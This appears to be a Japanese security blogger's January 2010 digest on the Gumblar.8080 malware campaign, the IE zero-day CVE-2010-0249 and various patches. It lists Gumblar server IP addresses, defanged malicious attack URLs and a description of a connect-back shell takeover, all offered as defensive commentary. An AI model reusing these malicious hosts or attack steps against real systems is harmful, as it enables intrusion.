というマルウェアネットワークの一種で、アダルトサイトに埋め込まれている、Pay-Par-Installビジネスの一つの形式ってのとは、現行の"Gumblar.8080"（syszyd32.exeさん）とはちょっと違う気もするけど、SecurityToolの画面がどど～んと出てますしね。
複数のベクトルが絡み合って進行してるのかしらん？

どこまで吹かずに耐えられますか？
ガンブラー vs ウイルスセキュリティZERO
あっいつのまにっ
あたりでダメ・・・

命名「Gumblar.8080系」、でもってまた改竄コードが変化
なんということでしょう！
難読化をやめたとたん、ウイルス対策ソフトは検出できなくなってしまいましたｗ

そして、なんということでしょう！
「/*handle exception*/」→「/*Exception*/」

また難読化です。orz
いいように弄ばれています。

まず殴られる、そして相手が殴る、そしてまた殴られる

----------
落穂

オンラインゲームをかたるフィッシング出現、ファンサイトから誘導

Aurora攻撃で株を上げるセキュリティベンダー

Web users still don’t select good passwords
Consumer Password Worst Practices
Rank:1 290,731 user loved -- "123456"

Blackhole DNS Update - rogues, trojans, fastflux domains
rogues, trojans, zbot domains and more to add to your malware blocklist of malware sinkhole:
なんか、nikkei とか mainichi とかあるとおもったら、全部 Gumblar.8080 の ru ドメインでした・・・
※コロコロ変わるので、これは塞いでも意味がありません。

Nmap 5.20 Released

----------
Gumblar.8080
91.121.1.99 AS16276(OVH Paris) *NEW IP
91.121.167.41 AS16276(OVH Paris) *NEW IP
91.121.24.139 AS16276(OVH Paris)
91.121.79.191 AS16276(OVH Paris)
217.23.5.27 AS49981(WORLDSTREAM) Netherlands
これまで無かった OVH 管轄が２つと、WorldStreamが戻ってきました。

----------
Google Safe Browsing
| 1264104014 | B | [goog-black-hash 1.49315 update]
| 1264104001 | M | [goog-malware-hash 1.18802 update]
| 296800 | -855(297655)
| 1266907 |
EoF

ライバルが手を結ぶ日
慶応2年1月21日（旧暦。新暦では1866年3月7日）、坂本竜馬らの仲介により長州藩と薩摩藩が薩長同盟を結んだ。
料理番組の日
1937年のこの日、BBCが世界初の料理番組「夕べの料理」を開始したことにちなむ。
と、なってますけど、英語版wikipediaにすら項目がないほど不明な番組・・・(refer: 世界初の料理番組とされるイギリスＢＢＣの「夕べの料理」･･･その番組の詳しい内容・写真資料などに関する情報を探しています。
日本テレビ系全国ネットで「キユーピー3分クッキング」放送開始。
聖アグネスの祝日 (304年)

----------
ソバ屋遅延
Internet Explorerのセキュリティ更新の事前告知 (定例外)
小野寺です。
「Internet Explorer 6の悪用事例を確認 (セキュリティ アドバイザリ 979352)」でお伝えしている脆弱性に対応する更新プログラムを2010/1/22にリリースします。
余裕が消し飛んだ様子・・・

Advance Notification for Out-of-Band Bulletin Release
We will be releasing MS10-002 tomorrow, January 21st, 2010. We are planning to release the update as close to 10:00 a.m. PST (UTC -8) as possible.
01/21/10AM PST => 01/22/3AM JSTということで、明日までお待ちください。

これを書いている時点(AM7 JST)ではまだ日本版の更新がありませんが、本家ではアドバイザリ979352にいくつかの修正が入っています。
Data Execution Prevention (DEP) Bypass
The DEP bypass exploit is not, at this time, publicly available and we have not seen it used in attacks.
ASLRで防護されてるから、Vista上では動作してないはず！

Microsoft E-Mail Products That Render using mshtml.dll Protected by Default
There have been reports that supported versions of Outlook, Outlook Express and Windows Live Mail are affected by the vulnerability in Security Advisory 979352.
IEだけじゃなくて、Outlook、Outlook Express そして Windows Live Mailもこの脆弱性をうける・・っと

Other products may also use the HTML rendering engine for Internet Explorer and could expose this vulnerability.Trident系のエンジン使用の製品にも影響があることを初めて認めましたとさ～

Office Applications with Active Scripting Enabled Potentially Vulnerable
We are also aware that the vulnerability can be exploited by including an ActiveX control in a Microsoft Access, Word, Excel, or PowerPoint file. Customers would have to open a malicious file to be at risk of exploitation.
をぃをぃをぃ・・・・

STAY TUNED Microsoft Update !

続くらしい
----------
DEP回避
Reports of DEP being bypassed
Yesterday we heard reports of a commercially available exploit that bypasses DEP. This exploit was made available to a limited number of major security vendors (Antivirus, IDS, and IPS vendors) and government CERT agencies. We wanted to use this opportunity to give an overview of current customer risk related to this DEP bypass.

その、limited number of major security vendorsといわれた Vupenですが
Internet Explorer 0-Day - DEP Does Not Prevent Exploitation
While the public exploit only targets Internet Explorer 6 without DEP (Data Execution Prevention), VUPEN Security has confirmed reliable code execution with Internet Explorer 8 and permanent DEP enabled.
Enabling DEP will only protect your systems from public exploits, however, disabling JavaScript is the only way to prevent DEP bypass attacks.
と、自信満々のご様子

他のセキュ会社の反応が鈍いので、もう少し様子見（明日のパッチで解消されるのかどうか）ですかね～

まだ続く
----------
実際の様子（シス管の人は見ないほうがいいかも）
冷や汗出ました

IEのポインタ参照処理の脆弱性（CVE-2010-0249）に関する検証レポート
うひ～
完全にリモートログインされてるぢゃありませんか・・
このリバースパーサ・デーモンの出所はいったい！？

IEのポインタ参照処理の脆弱性（CVE-2010-0249）検証メモ
検証では、脆弱性の存在するターゲットPC（Windows XP SP2 & IE 6）で細工された応答を返すサーバにアクセスすることで脆弱性を利用した攻撃を行い、任意のサーバの任意のポートにコネクトバックさせ、結果、シェルを奪取するというものです。

今後、Gumbelr亜種が、この脆弱性を利用しはじめたりなんかして昨今のGumbler騒ぎに拍車がかからないことを祈っております。
# Gumber騒ぎは個人的にち食傷気味だったりするんですよね。
たぶんわざと・・・typoがあるのはともかく、本気でそう願います。

これは確かにIE/OutLook系の全面使用禁止を打ち出されてもしょうがないですね。

とどめ・・
----------
ぎゃ～す
不特定多数を対象としたMicrosoft Internet Explorerのゼロデイ脆弱性を狙う攻撃【Tokyo SOC Report】
先日、マイクロソフトより公開されたInternet Explorerの新たな脆弱性(*1)を狙う攻撃が不特定多数を対象に行われていることを確認しました。この攻撃は、Webサイト経由で行われています。以下は、攻撃元URLの例です。
ちょっとまった・ちょっとまった・ちょっとまった
1iegoogle.22sys22・cn/pz/au.htm
2iegoogle.22sys22・cn/pz/au.htm
3iegoogle.22sys22・cn/pz/au.htm

IE6使用中のところは、今すぐにでも使用を中止すべきです。
Revisiting the Internet Explorer Security Bug
I had just finished opening an account at the local bank late last week when I happened to catch a glimpse of the bank manager’s computer screen: He had about 20 Web browser windows open, and it was hard to ignore the fact that he was using Internet Explorer 6 to surf the Web.
For more than a second I paused, and considered asking for my deposit back.
うはははは

Govt issues IE security warning
オーストラリア政府も

え？まだあるの？
----------
そしてFirefoxへようこそ
German government IE warning leads to spike in Firefox downloads
People in Germany Are Switching Browsers
Operaかと思ってたけど、やっぱり Firefoxなんですね～

Firefoxを導入したら No-script, Firebug, IE_tab あたりは必須でしょうか？
他にもなにかあったら教えてください。
※NoScriptは必ず IFRAMEを禁止にしてください。

Firefox 3.6のリリースは日本時間の1月22日2:00AMを予定
Comming Soon

----------
一方・・16bit(Win3.1)アプリも
こっちはさっさと斬ってしまっていいと思うんですが・・
Windows hole discovered after 17 years - Update
The problem is caused by flaws in the Virtual DOS Machine (VDM) introduced in 1993 to support 16-bit applications (real mode applications for 8086). VDM is based on the Virtual 8086 Mode (VM86) in 80386 processors and, among other things, intercepts hardware routines such as BIOS calls.

XPの場合： 以下をエディタで開いて"vdmdisallow.reg"として保存
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\AppCompat]

"VDMDisallowed"=dword:00000001
into a file called vdmdisallow.reg and double click the file. Windows will then automatically import the key (admin rights are required to perform this action).

Microsoft investigates 17-year-old Windows flaw

Windowsに新たな未修正の脆弱性、回避策の利用を

----------
しょっくうぇーぶ
Shockwaveってまだ必要なんですか？ほんとに（苦笑）
Security update available for Shockwave Player
Adobe recommends Shockwave Player users uninstall Shockwave version 11.5.2.602 and earlier on their systems, restart their systems, and install Shockwave version 11.5.6.606, available here: Get Shockwave.

Adobe Shockwave Player 3D Model Parsing Eight Vulnerabilities 4
８ですか・・
Security Bulletin - Adobe Shockwave Player
Adobe Releases Shockwave Player Update
Adobe fixes critical holes in Shockwave
Critical flaws haunt Adobe Shockwave Player

----------
Zero-DayのApple
もう一方のZERO-DAYの雄（笑）
セキュリティアップデート 2010-001 について
なんか、知らないのまで増えてるし・・

Apple Releases Security Update 2010-001
アップル、Mac OS X用「セキュリティアップデート2010-001」を公開
Apple Mac OS X Security Update Fixes Multiple Vulnerabilities 4
Apple Security Update 2010-001
Mac OS Xにパッチ、12件の重大なセキュリティホールを修正
Apple releases Security Update for Mac OS X

----------
まだまだっ（A PIT)

RealPlayer Multiple Vulnerabilities 4
またですか・・
Update to the latest version.

BIND 9 の DNSSEC 検証コードに脆弱性
遠隔の第三者によって、不正な NXDOMAIN レコードをキャッシュに追加される可能性があります。
BIND 9 DNSSEC validation code could cause bogus NXDOMAIN responses
ISC BIND DNSSEC CNAME / DNAME and NXDOMAIN Cache Poisoning Vulnerabilities 2

Pidgin MSN <= 2.6.4 File Download Vulnerability
Fixed in Pidgin 2.6.5 Update to the latest version.

----------
LGPL?
/*LGPL*/ infected files Clean-up/removal script
アンタノトコが ガンブラー™を主張したんだから最後まで責任取りなさいよね～
用語混乱させた責任は重いぞ～（笑）

というか、こんな怪しげな(hosted : possible.in) Script Cleanerなんか誰がつかうっていうんだか・・
堂々と Symantecの中にホストしなさいよ～
※出所不明の実行ファイルをダウンロードしてはいけません。

だいたい・・Scriptだけ削除してそれで再開できるほど甘いマルウェアじゃないことくらいそろそろ判ってるはず・・・
だけど、本気でわかってないのかしらん？
（まだCVE-2009-4324関連シグネチャはBloodHoundの状態）

LACさんも余裕ありげだけど・・
新春早々の「Gumblar一問一答」
JSOCのお客様でも感染被害やホームページ改ざん被害が継続しており、新年早々のんびりはできないようです。
ふ～ん
WAFで止めることはできますか？
NO!
ふ～ん

Tripwireを導入する
Tripwireによるホスト型IDSの構築
こっちのほうが役にたつかもですね～（重いけど）

しかし、セキュ会社がこれじゃ、今後が思い遣られますね・・・(嘆息）

微妙に続く
----------
失敗
「安全なウェブサイトの作り方　改訂第4版」を公開
～ ウェブアプリケーションに脆弱性を作り込んでしまった「失敗例」を拡充 ～

また新たに、WAF（Web Application Firewall）(*9)の活用に関して、WAFの動作原理、WAFの使用が有効な状況、導入検討における留意点を第2章に追記しました。
上で思いっきり否定されてますが・・・

----------
その他
時間切れですよ・・

iPhish - fake iPhone warranty steals info

Yahoo!フィッシング～容疑者グループ逮捕で偽サイト激減、今後の注意点は？

Operation Aurora (Deep Insight):
CVE-2010-0249 in the wild - xx222.8866.org and others – part 0 -- extraexploit

OpenLDAPからActive Directoryへ移行せよ――（1）
Active Directoryなら管理作業が楽になる！
！？

Using Curl to Retrieve Malicious Websites
cURL as cURL
Curlかと思ったのは内緒

----------
睡魔
ガンブラー vs 睡魔
ちなみに今日、とあるホームページを管理している係の人と話す事があったので
「最近こういうウイルスが流行ってるので～」
と忠告しといたんですが
「へー」と「ふーん」と「ほー」と「あ、そうなんですか」という返事しか返ってきませんでした。

ああ・・でじゃぶ・・

----------
8080
91.121.4.99 AS16276(OVH Paris)
91.121.7.26 AS16276(OVH Paris)
91.121.88.218 AS16276(OVH Paris)
94.23.206.229 AS16276(OVH Paris)
82.98.231.25 AS8455(ATOM86)
おかえりなさい > ATOM86

----------
Google Safe Browsing
| 1264017622 | B | [goog-black-hash 1.49243 update]
| 1264017607 | M | [goog-malware-hash 1.18778 update]
| 297655 | -268(297923) 減ってる減ってる・・
| 1264174 |
EoF